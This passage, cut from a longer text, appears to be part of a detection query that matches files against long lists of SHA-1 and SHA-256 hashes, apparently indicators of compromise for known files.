'4a705af959af61bad48ef7579f839cb5ebd654d2', 'bc2f3850c7b858340d7ed27b90e63b036881fd6c', 'e22495d92ac3dcae5eeb1980549a9ead8155f98a', 'c969f1f73922fd95db1992a5b552fbc488366a40', '4c18754dca481f107f0923fb8ef5e149d128525d', '2fc6845047abcf2a918fce89ab99e4955d08e72c', '4f7a8e26a97980544be634b26899afbefb0a833c', '21edff2937eb5cd6f6b0acb7ee5247681f624260', 
'89cd760e8cb19d29ee08c430fb17a5fd4455c741', '6c1bb3a72ebfb5359b9e22ca44d0a1ff825a68f2', '064de88dbbea67c149e779aac05228e5405985c7', 'ea877092d57373cb466b44e7dbcad4ce9a547344', '55ab7e27412eca433d76513edc7e6e03bcdd7eda', '976777d39d73034df6b113dfce1aa6e1d00ffcfd', '1f7501e01d84a2297c85cb39880ec4e40ac3fe8a', 'a6816949cd469b6e5c35858d19273936fab1bef6', '91f832f46e4c38ecc9335460d46f6f71352cffed', '43419df1f9a07430a18c5f3b3cc74de621be0f8e', '01779ee53f999464465ed690d823d160f73f10e7', 'bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b', '27d3ebea7655a72e6e8b95053753a25db944ec0f', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', '10115219e3595b93204c70eec6db3e68a93f3144', '33285b2e97a0aeb317166cce91f6733cf9c1ad53', '2c27abbbbcf10dfb75ad79557e30ace5ed314df8', '10e15ba8ff8ed926ddd3636cec66a0f08c9860a4', '291b4a88ffd2ac1d6bf812ecaedc2d934dc503cb', '05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d', '8f5cd4a56e6e15935491aa40adb1ecad61eafe7c', 'a7948a4e9a3a1a9ed0e4e41350e422464d8313cd', '19bd488fe54b011f387e8c5d202a70019a204adf', 'eeff4ec4ebc12c6acd2c930dc2eaaf877cfec7ec', 'c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60', '15d1a6a904c8409fb47a82aefa42f8c3c7d8c370', 'd02403f85be6f243054395a873b41ef8a17ea279', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '4789b910023a667bee70ff1f1a8f369cffb10fe8', '50e2bc41f0186fdce970b80e2a2cb296353af586', 'b97a8d506be2e7eaa4385f70c009b22adbd071ba', '78b9481607ca6f3a80b4515c432ddfe6550b18a8', 'e039c9dd21494dbd073b4823fc3a17fbb951ec6c', '806832983bb8cb1e26001e60ea3b7c3ade4d3471', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f', 'a3ed5cbfbc17b58243289f3cf575bf04be49591d', '7fb52290883a6b69a96d480f2867643396727e83', '5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a', 'da9cea92f996f938f699902482ac5313d5e8b28e', 'dc7b022f8bd149efbcb2204a48dce75c72633526', 'd979353d04bf65cc92ad3412605bc81edbb75ec2', '4b009e91bae8d27b160dc195f10c095f8a2441e1', '51b60eaa228458dee605430aae1bc26f3fc62325', 'c6bd965300f07012d1b651a9b8776028c45b149a', 
'729a8675665c61824f22f06c7b954be4d14b52c4', '37364cb5f5cefd68e5eca56f95c0ab4aff43afcc', 'e4436c8c42ba5ffabd58a3b2256f6e86ccc907ab', '7ba19a701c8af76988006d616a5f77484c13cb0a', '25bf4e30a94df9b8f8ab900d1a43fd056d285c9d', 'd8498707f295082f6a95fd9d32c9782951f5a082', '5e6ddd2b39a3de0016385cbd7aa50e49451e376d', '943593e880b4d340f2548548e6e673ef6f61eed3', '2dfcb799b3c42ecb0472e27c19b24ac7532775ce', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98', '6714380bc0b8ab09b9a0d2fa66d1b025b646b946', '4a7d66874a0472a47087fabaa033a85d47413379', '012db3a80faf1f7f727b538cbe5d94064e7159de', '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4', 'c6d349823bbb1f5b44bae91357895dba653c5861', '643383938d5e0d4fd30d302af3e9293a4798e392', 'ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d', '1d0df45ee3fa758f0470e055915004e6eae54c95', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', 'f42f28d164205d9f6dab9317c9fecad54c38d5d2', 'd9c09dd725bc7bc3c19b4db37866015817a516ef', 'd5fd9fe10405c4f90235e583526164cd0902ed86', '0c74d09da7baf7c05360346e4c3512d0cd433d59', '9c256edd10823ca76c0443a330e523027b70522d', '65d8a7c2e867b22d1c14592b020c548dd0665646', '7859e75580570e23a1ef7208b9a76f81738043d5', 'b242b0332b9c9e8e17ec27ef10d75503d20d97b6', '6523b3fd87de39eb5db1332e4523ce99556077dc', 'ac600a2bc06b312d92e649b7b55e3e91e9d63451', 'fe10018af723986db50701c8532df5ed98b17c39', 'b9807b8840327c6d7fbdde45fc27de921f1f1a82', 'a3636986cdcd1d1cb8ab540f3d5c29dcc90bb8f0', '054a50293c7b4eea064c91ef59cf120d8100f237', '2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8', '485c0b9710a196c7177b99ee95e5ddb35b26ddd1', 'faa870b0cb15c9ac2b9bba5d0470bd501ccd4326', '4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c', '0291d0457acaf0fe8ed5c3137302390469ce8b35', '8183a341ba6c3ce1948bf9be49ab5320e0ee324d', '5a7dd0da0aee0bdedc14c1b7831b9ce9178a0346', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'b25170e09c9fb7c0599bfba3cf617187f6a733ac', '19f3343bfad0ef3595f41d60272d21746c92ffca', 'a48aa80942fc8e0699f518de4fd6512e341d4196', 'f6f11ad2cd2b0cf95ed42324876bee1d83e01775', 
'9a35ae9a1f95ce4be64adc604c80079173e4a676', 'ea360a9f23bb7cf67f08b88e6a185a699f0c5410', '6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403', '08596732304351b311970ff96b21f451f23b1e25', '29a190727140f40cea9514a6420f5a195e36386b', 'b4d014b5edd6e19ce0e8395a64faedf49688ecb5', '31fac347aa26e92db4d8c9e1ba37a7c7a2234f08', 'fcde5275ee1913509927ce5f0f85e6681064c9d2', 'f052dc35b74a1a6246842fbb35eb481577537826', 'c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65', '33cdab3bbc8b3adce4067a1b042778607dce2acd', '2d503a2457a787014a1fdd48a2ece2e6cbe98ea7', 'f9519d033d75e1ab6b82b2e156eafe9607edbcfb', '89909fa481ff67d7449ee90d24c167b17b0612f1', 'a7d827a41b2c4b7638495cd1d77926f1ba902978', 'c23eeb6f18f626ce1fd840227f351fa7543bb167', '3805e4e08ad342d224973ecdade8b00c40ed31be', '8302802b709ad242a81b939b6c90b3230e1a1f1e', 'ac13941f436139b909d105ad55637e1308f49d9a', '92f251358b3fe86fd5e7aa9b17330afa0d64a705', '623cd2abef6c92255f79cbbd3309cb59176771da', 'af50109b112995f8c82be8ef3a88be404510cdde', 'a00e444120449e35641d58e62ed64bb9c9f518d2', '9923c8f1e565a05b3c738d283cf5c0ed61a0b90f', '7eec3a1edf3b021883a4b5da450db63f7c0afeeb', '078ae07dec258db4376d5a2a05b9b508d68c0123', 'ef80da613442047697bec35ea228cde477c09a3d', '6003184788cd3d2fc624ca801df291ccc4e225ee', '558aad879b6a47d94a968f39d0a4e3a3aaef1ef1', '877c6c36a155109888fe1f9797b93cb30b4957ef', 'f3cce7e79ab5bd055f311bb3ac44a838779270b6', '80fa962bdfb76dfcb9e5d13efc38bb3d392f2e77', '3b6b35bca1b05fafbfc883a844df6d52af44ccdc', '351cbd352b3ec0d5f4f58c84af732a0bf41b4463', '609fa1efcf61e26d64a5ceb13b044175ab2b3a13', 'dc0e97adb756c0f30b41840a59b85218cbdd198f', '71469dce9c2f38d0e0243a289f915131bf6dd2a8', '05ac1c64ca16ab0517fe85d4499d08199e63df26', '2261198385d62d2117f50f631652eded0ecc71db', '414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c', '8626ab1da6bfbdf61bd327eb944b39fd9df33d1d', '5fb9421be8a8b08ec395d05e00fd45eb753b593a', 'd702d88b12233be9413446c445f22fda4a92a1d9', 'e74b6dda8bc53bc687fc21218bd34062a78d8467', 'a197a02025946aca96d6e74746f84774df31249e', 
'1f25f54e9b289f76604e81e98483309612c5a471', 'e3c1dd569aa4758552566b0213ee4d1fe6382c4b', '879fcc6795cebe67718388228e715c470de87dca', '3ae56ab63230d6d9552360845b4a37b5801cc5ea', '74e4e3006b644392f5fcea4a9bae1d9d84714b57', 'ce549714a11bd43b52be709581c6e144957136ec', '3abb9d0a9d600200ae19c706e570465ef0a15643', 'fbf8b0613a2f7039aeb9fa09bd3b40c8ff49ded2', 'cc51be79ae56bc97211f6b73cc905c3492da8f9d', 'b03b1996a40bfea72e4584b82f6b845c503a9748', '0307d76750dd98d707c699aee3b626643afb6936', '8db869c0674221a2d3280143cbb0807fac08e0cc', '2f991435a6f58e25c103a657d24ed892b99690b8', 'c948ae14761095e4d76b55d9de86412258be7afd', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', '152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67', 'a7bd05de737f8ea57857f1e0845a25677df01872', 'aca8e53483b40a06dfdee81bb364b1622f9156fe', 'f36a47edfacd85e0c6d4d22133dd386aee4eec15', 'bf87e32a651bdfd9b9244a8cf24fca0e459eb614', 'bc47e15537fa7c32dfefd23168d7e1741f8477ed', '3ee2fd08137e9262d2e911158090e4a7c7427ea0', '4e826430a1389032f3fe06e2cc292f643fb0c417', '745bad097052134548fe159f158c04be5616afc2', '28b1c0b91eb6afd2d26b239c9f93beb053867a1a', '0466e90bf0e83b776ca8716e01d35a8a2e5f96d3', 'e6765d8866cad6193df1507c18f31fa7f723ca3e', '1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b', '57511ef5ff8162a9d793071b5bf7ebe8371759de', 'd098600152e5ee6a8238d414d2a77a34da8afaaa', '16d7ecf09fc98798a6170e4cef2745e0bee3f5c7', '8b6aa5b2bff44766ef7afbe095966a71bc4183fa', 'c834c4931b074665d56ccab437dfcc326649d612', '8d59fd14a445c8f3f0f7991fa6cd717d466b3754', 'd94f2fb3198e14bfe69b44fb9f00f2551f7248b2', '64e4ac8b9ea2f050933b7ec76a55dd04e97773b4', '93aa3bb934b74160446df3a47fa085fd7f3a6be9', '14bf0eaa90e012169745b3e30c281a327751e316', '738b7918d85e5cb4395df9e3f6fc94ddad90e939', '8c377ab4eebc5f4d8dd7bb3f90c0187dfdd3349f', 'fff4f28287677caabc60c8ab36786c370226588d', '34c85afe6d84cd3deec02c0a72e5abfa7a2886c3', '3f223581409492172a1e875f130f3485b90fbe5f', '282bb241bda5c4c1b8eb9bf56d018896649ca0e1', 'f1c8c3926d0370459a1b7f0cf3d17b22ff9d0c7f', 
'e83458c4a6383223759cd8024e60c17be4e7c85f', 'd569d4bab86e70efbcdfdac9d822139d6f477b7c', '2a6e6bd51c7062ad24c02a4d2c1b5e948908d131', 'a65fabaf64aa1934314aae23f25cdf215cbaa4b6', 'c257aa4094539719a3c7b7950598ef872dbf9518', '1292c7dd60214d96a71e7705e519006b9de7968f', 'b4d1554ec19504215d27de0758e13c35ddd6db3e', '994dc79255aeb662a672a1814280de73d405617a', '5dd2c31c4357a8b76db095364952b3d0e3935e1d', '21e6c104fe9731c874fab5c9560c929b2857b918', 'e92817a8744ebc4e4fa5383cdce2b2977f01ecd4', '35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd', 'bb962c9a8dda93e94fef504c4159de881e4706fe', '82ba5513c33e056c3f54152c8555abf555f3e745', 'f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79', 'cb3de54667548a5c9abf5d8fa47db4097fcee9f1', '0c26ab1299adcd9a385b541ef1653728270aa23e', 'f02af84393e9627ba808d4159841854a6601cf80', 'cb22723faa5ae2809476e5c5e9b9a597b26cab9b', 'f9feb60b23ca69072ce42264cd821fe588a186a6', '160c96b5e5db8c96b821895582b501e3c2d5d6e7', '0b8b83f245d94107cb802a285e6529161d9a834d', 'd7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4', 'd7f7594ff084201c0d9fa2f4ef1626635b67bce5', '7d7c03e22049a725ace2a9812c72b53a66c2548b', '589a7d4df869395601ba7538a65afae8c4616385', '1f3799fed3cf43254fe30dcdfdb8dc02d82e662b', '72966ca845759d239d09da0de7eebe3abe86fee3', '0f780b7ada5dd8464d9f2cc537d973f5ac804e9c', '26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab', '7c6cad6a268230f6e08417d278dda4d66bb00d13', 'd04e5db5b6c848a29732bfd52029001f23c3da75', 'a87d6eac2d70a3fbc04e59412326b28001c179de', 'cce9b82f01ec68f450f5fe4312f40d929c6a506e', '8cc8974a05e81678e3d28acfe434e7804abd019c', '1e7c241b9a9ea79061b50fb19b3d141dee175c27', '00b4e8b7644d1bf93f5ddb5740b444b445e81b02', '4d41248078181c7f61e6e4906aa96bbdea320dc2', 'f3db629cfe37a73144d5258e64d9dd8b38084cf4', 'd2e6fc9259420f0c9b6b1769be3b1f63eb36dc57', '99201c9555e5faf6e8d82da793b148311f8aa4b8', 'a2e0b3162cfa336cd4ab40a2acc95abe7dc53843', '12d38abbc5391369a4c14f3431715b5b76ac5a2a', 'b4dcdbd97f38b24d729b986f84a9cdb3fc34d59f', '490109fa6739f114651f4199196c5121d1c6bdf2', 
'e5021a98e55d514e2376aa573d143631e5ee1c13', 'af6e1f2cfb230907476e8b2d676129b6d6657124', 'ddbe809b731a0962e404a045ab9e65a0b64917ad', 'b480c54391a2a2f917a44f91a5e9e4590648b332', 'a21c84c6bf2e21d69fa06daaf19b4cc34b589347', 'dc55217b6043d819eadebd423ff07704ee103231', '6053d258096bccb07cb0057d700fe05233ab1fbb', 'b0032b8d8e6f4bd19a31619ce38d8e010f29a816', 'eb93d2f564fea9b3dc350f386b45de2cd9a3e001', '8692274681e8d10c26ddf2b993f31974b04f5bf0', 'f5696fb352a3fbd14fb1a89ad21a71776027f9ab', '5db61d00a001fd493591dc919f69b14713889fc5', '2b4d0dead4c1a7cc95543748b3565cfa802e5256', '205c69f078a563f54f4c0da2d02a25e284370251', '7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c', '35829e096a15e559fcbabf3441d99e580ca3b26e', '17fa047c1f979b180644906fe9265f21af5b0509', 'ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b', '461882bd59887617cadc1c7b2b22d0a45458c070', '7838fb56fdab816bc1900a4720eea2fc9972ef7a', '1f3a9265963b660392c4053329eb9436deeed339', 'e09b5e80805b8fe853ea27d8773e31bff262e3f7', '5f8356ffa8201f338dd2ea979eb47881a6db9f03', '37e6450c7cd6999d080da94b867ba23faa8c32fe', '7ab4565ba24268f0adadb03a5506d4eb1dc7c181', '00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b', '9c24dd75e4074041dbe03bf21f050c77d748b8e9', '3270720a066492b046d7180ca6e60602c764cac7', '0b6ec2aedc518849a1c61a70b1f9fb068ede2bc3', '814200191551faec65b21f5f6819b46c8fc227a3', '696d68bdbe1d684029aaad2861c49af56694473a', 'b89a8eef5aeae806af5ba212a8068845cafdab6f', '15df139494d2c40a645fb010908551185c27f3c5', '947db58d6f36a8df9fa2a1057f3a7f653ccbc42e', 'fe1d909ab38de1389a2a48352fd1c8415fd2eab0', '7667b72471689151e176baeba4e1cd9cd006a09a', 'd25340ae8e92a6d29f599fef426a2bc1b5217299', '6abbc3003c7aa69ce79cbbcd2e3210b07f21d202', 'd34a7c497c603f3f7fcad546dc4097c2da17c430', 'b8de3a1aeeda9deea43e3f768071125851c85bd0', '9c6749fc6c1127f8788bff70e0ce9062959637c9', '4268f30b79ce125a81d0d588bef0d4e2ad409bbb', '213ba055863d4226da26a759e8a254062ea77814', 'a4b2c56c12799855162ca3b004b4b2078c6ecf77', '27eab595ec403580236e04101172247c4f5d5426', 
'd62fa51e520022483bdc5847141658de689c0c29', 'ccdd3a1ebe9a1c8f8a72af20a05a10f11da1d308', '8fb149fc476cf5bf18dc575334edad7caf210996', 'e35a2b009d54e1a0b231d8a276251f64231b66a3', 'd0d39e1061f30946141b6ecfa0957f8cc3ddeb63', '166759fd511613414d3213942fe2575b926a6226', '73bac306292b4e9107147db94d0d836fdb071e33', '460008b1ffd31792a6deadfa6280fb2a30c8a5d2', '2c5ff272bd345962ed41ab8869aef41da0dfe697', '9d07df024ec457168bf0be7e0009619f6ac4f13c', 'c4ed28fdfba7b8a8dfe39e591006f25d39990f07', '30a224b22592d952fbe2e6ad97eda4a8f2c734e0', '5520ac25d81550a255dc16a0bb89d4b275f6f809', '400f833dcc2ef0a122dd0e0b1ec4ec929340d90e', '6b54f8f137778c1391285fee6150dfa58a8120b1', 'cc0e0440adc058615e31e8a52372abadf658e6b1', 'cb3f30809b05cf02bc29d4a7796fb0650271e542', 'a64354aac2d68b4fa74b5829a9d42d90d83b040c', 'a6fe4f30ca7cb94d74bc6d42cdd09a136056952e', 'e6305dddd06490d7f87e3b06d09e9d4c1c643af0', '90a76945fd2fa45fab2b7bcfdaf6563595f94891', '53f776d9a183c42b93960b270dddeafba74eb3fb', '6100eb82a25d64a7a7702e94c2b21333bc15bd08', '53acd4d9e7ba0b1056cf52af0d191f226eddf312', '910cb12aa49e9f35ecc4907e8304adf0dcca8cf1', '4b882748faf2c6c360884c6812dd5bcbce75ebff', 'c95db1e82619fb16f8eec9a8209b7b0e853a4ebe', '4b8c0445075f09aeef542ab1c86e5de6b06e91a3', 'bbc1e5fd826961d93b76abd161314cb3592c4436', 'bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825', '1acc7a486b52c5ee6619dbdc3b4210b5f48b936f', '468e2e5505a3d924b14fedee4ddf240d09393776', 'c8d87f3cd34c572870e63a696cf771580e6ea81b', 'f18e669127c041431cde8f2d03b15cfc20696056') OR sha256 IN ('15c53eb3a0ea44bbd2901a45a6ebeae29bb123f9c1115c38dfb2cdbec0642229', 'ff6729518a380bf57f1bc6f1ec0aa7f3012e1618b8d9b0f31a61d299ee2b4339', 'f088b2ba27dacd5c28f8ee428f1350dca4bc7c6606309c287c801b2e1da1a53d', '9a1d66036b0868bbb1b2823209fedea61a301d5dd245f8e7d390bd31e52d663e', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', 'f51bdb0ad924178131c21e39a8ccd191e46b5512b0f2e1cc8486f63e84e5d960', 
'b9b3878ddc5dfb237d38f8d25067267870afd67d12a330397a8853209c4d889c', '96bf3ee7c6673b69c6aa173bb44e21fa636b1c2c73f4356a7599c121284a51cc', '5a826b4fa10891cf63aae832fc645ce680a483b915c608ca26cedbb173b1b80a', '6948480954137987a0be626c24cf594390960242cd75f094cd6aaa5c2e7a54fa', '49ed27460730b62403c1d2e4930573121ab0c86c442854bc0a62415ca445a810', 'be54f7279e69fb7651f98e91d24069dbc7c4c67e65850e486622ccbdc44d9a57', '3d23bdbaf9905259d858df5bf991eb23d2dc9f4ecda7f9f77839691acef1b8c4', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'b48a309ee0960da3caaaaf1e794e8c409993aeb3a2b64809f36b97aac8a1e62a', '84bf1d0bcdf175cfe8aea2973e0373015793d43907410ae97e2071b2c4b8e2d4', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c9b49b52b493b53cd49c12c3fa9553e57c5394555b64e32d1208f5b96a5b8c6e', '79e2d37632c417138970b4feba91b7e10c2ea251c5efe3d1fc6fa0190f176b57', '3390919bb28d5c36cc348f9ef23be5fa49bfd81263eb7740826e4437cbe904cd', '58c071cfe72e9ee867bba85cbd0abe72eb223d27978d6f0650d0103553839b59', '607dc4c75ac7aef82ae0616a453866b3b358c6cf5c8f9d29e4d37f844306b97c', '358ac54be252673841a1d65bfc2fb6d549c1a4c877fa7f5e1bfa188f30375d69', 'd0bd1ae72aeb5f3eabf1531a635f990e5eaae7fdd560342f915f723766c80889', 'f85cca4badff17d1aa90752153ccec77a68ad282b69e3985fdc4743eaea85004', '6908ebf52eb19c6719a0b508d1e2128f198d10441551cbfb9f4031d382f5229f', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', 'de6bf572d39e2611773e7a01f0388f84fb25da6cba2f1f8b9b36ffba467de6fa', '950a4c0c772021cee26011a92194f0e58d61588f77f2873aa0599dff52a160c9', '36505921af5a09175395ebaea29c72b2a69a3a9204384a767a5be8a721f31b10', '6de84caa2ca18673e01b91af58220c60aecd5cccf269725ec3c7f226b2167492', 'ef86c4e5ee1dbc4f81cd864e8cd2f4a2a85ee4475b9a9ab698a4ae1cc71fbeb0', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '7cfa5e10dff8a99a5d544b011f676bc383991274c693e21e3af40cf6982adb8c', 
'f596e64f4c5d7c37a00493728d8756b243cfdc11e3372d6d6dfeffc13c9ab960', '0aafa9f47acf69d46c9542985994ff5321f00842a28df2396d4a3076776a83cb', '131d5490ceb9a5b2324d8e927fea5becfc633015661de2f4c2f2375a3a3b64c6', '3124b0411b8077605db2a9b7909d8240e0d554496600e2706e531c93c931e1b5', '1b7fb154a7b7903a3c81f12f4b094f24a3c60a6a8cffca894c67c264ab7545fa', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497', '9c2f3e9811f7d0c7463eaa1ee6f39c23f902f3797b80891590b43bbe0fdf0e51', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c60fcff9c8e5243bbb22ec94618b9dcb02c59bb49b90c04d7d6ab3ebbd58dc3a', '4045ae77859b1dbf13972451972eaaf6f3c97bea423e9e78f1c2f14330cd47ca', 'a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '3f2fda9a7a9c57b7138687bbce49a2e156d6095dddabb3454ea09737e02c3fa5', 'f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', '5bc3994612624da168750455b363f2964e1861dba4f1c305df01b970ac02a7ae', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '0fd2df82341bf5ebb8a53682e60d08978100c01acb0bed7b6ce2876ada80f670', '8111085022bda87e5f6aa4c195e743cc6dd6a3a6d41add475d267dc6b105a69f', 'be03e9541f56ac6ed1e81407dcd7cc85c0ffc538c3c2c2c8a9c747edbcf13100', '47f08f7d30d824a8f4bb8a98916401a37c0fd8502db308aba91fe3112b892dcc', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '7f375639a0df7fe51e5518cf87c3f513c55bc117db47d28da8c615642eb18bfa', 'a56c2a2425eb3a4260cc7fc5c8d7bed7a3b4cd2af256185f24471c668853aee8', 'a3e507e713f11901017fc328186ae98e23de7cea5594687480229f77d45848d8', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', 
'9529efb1837b1005e5e8f477773752078e0a46500c748bc30c9b5084d04082e6', '2bbe65cbec3bb069e92233924f7ee1f95ffa16173fceb932c34f68d862781250', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '39cfde7d401efce4f550e0a9461f5fc4d71fa07235e1336e4f0b4882bd76550e', '984a77e5424c6d099051441005f2938ae92b31b5ad8f6521c6b001932862add7', 'db2a9247177e8cdd50fe9433d066b86ffd2a84301aa6b2eb60f361cfff077004', '30706f110725199e338e9cc1c940d9a644d19a14f0eb8847712cba4cacda67ab', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', '9f4ce6ab5e8d44f355426d9a6ab79833709f39b300733b5b251a0766e895e0e5', 'd92eab70bcece4432258c9c9a914483a2267f6ab5ce2630048d3a99e8cb1b482', 'e4a7da2cf59a4a21fc42b611df1d59cae75051925a7ddf42bf216cc1a026eadb', '525d9b51a80ca0cd4c5889a96f857e73f3a80da1ffbae59851e0f51bdfb0b6cd', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '4cff6e53430b81ecc4fae453e59a0353bcfe73dd5780abfc35f299c16a97998e', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', 'f8236fc01d4efaa48f032e301be2ebba4036b2cd945982a29046eca03944d2ae', '575e58b62afab094c20c296604dc3b7dd2e1a50f5978d8ee24b7dca028e97316', '3d9e83b189fcf5c3541c62d1f54a0da0a4e5b62c3243d2989afc46644056c8e3', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', 'c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c', '7e0124fcc7c95fdc34408cf154cb41e654dade8b898c71ad587b2090b1da30d7', '61a1bdddd3c512e681818debb5bee94db701768fc25e674fcad46592a3259bd0', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '45abdbcd4c0916b7d9faaf1cd08543a3a5178871074628e0126a6eda890d26e0', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', '1e8b0c1966e566a523d652e00f7727d8b0663f1dfdce3b9a09b9adfaef48d8ee', 'e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e', 
'93d873cdf23d5edc622b74f9544cac7fe247d7a68e1e2a7bf2879fad97a3ae63', 'a9706e320179993dade519a83061477ace195daa1b788662825484813001f526', '61d6e40601fa368800980801a662a5b3b36e3c23296e8ae1c85726a56ef18cc8', '47eaebc920ccf99e09fc9924feb6b19b8a28589f52783327067c9b09754b5e84', 'fd8669794c67b396c12fc5f08e9c004fdf851a82faf302846878173e4fbecb03', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', '07b6d69bafcfd767f1b63a490a8843c3bb1f8e1bbea56176109b5743c8f7d357', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', '99f4994a0e5bd1bf6e3f637d3225c69ff4cd620557e23637533e7f18d7d6cba1', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', 'ece0a900ea089e730741499614c0917432246ceb5e11599ee3a1bb679e24fd2c', '8ef0ad86500094e8fa3d9e7d53163aa6feef67c09575c169873c494ed66f057f', '36b9e31240ab0341873c7092b63e2e0f2cab2962ebf9b25271c3a1216b7669eb', '6b830ea0db6546a044c9900d3f335e7820c2a80e147b0751641899d1a5aa8f74', '9c10e2ec4f9ef591415f9a784b93dc9c9cdafa7c69602c0dc860c5b62222e449', '5b9623da9ba8e5c80c49473f40ffe7ad315dcadffc3230afdc9d9226d60a715a', 'fafa1bb36f0ac34b762a10e9f327dcab2152a6d0b16a19697362d49a31e7f566', 'e61a54f6d3869b43c4eceac3016df73df67cce03878c5a6167166601c5d3f028', 'f88ebb633406a086d9cca6bc8b66a4ea940c5476529f9033a9e0463512a23a57', '2aa1b08f47fbb1e2bd2e4a492f5d616968e703e1359a921f62b38b8e4662f0c4', '06508aacb4ed0a1398a2b0da5fa2dbf7da435b56da76fd83c759a50a51c75caf', 'cc383ad11e9d06047a1558ed343f389492da3ac2b84b71462aee502a2fa616c8', '845f1e228de249fc1ddf8dc28c39d03e8ad328a6277b6502d3932e83b879a65a', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', '64f9e664bc6d4b8f5f68616dd50ae819c3e60452efd5e589d6604b9356841b57', '2a652de6b680d5ad92376ad323021850dab2c653abf06edf26120f7714b8e08a', '85866e8c25d82c1ec91d7a8076c7d073cccf421cf57d9c83d80d63943a4edd94', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 
'9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', 'bb50818a07b0eb1bd317467139b7eb4bad6cd89053fecdabfeae111689825955', '9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87', 'b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '1c8dfa14888bb58848b4792fb1d8a921976a9463be8334cff45cc96f1276049a', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', '5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a', 'f40435488389b4fb3b945ca21a8325a51e1b5f80f045ab019748d0ec66056a8b', 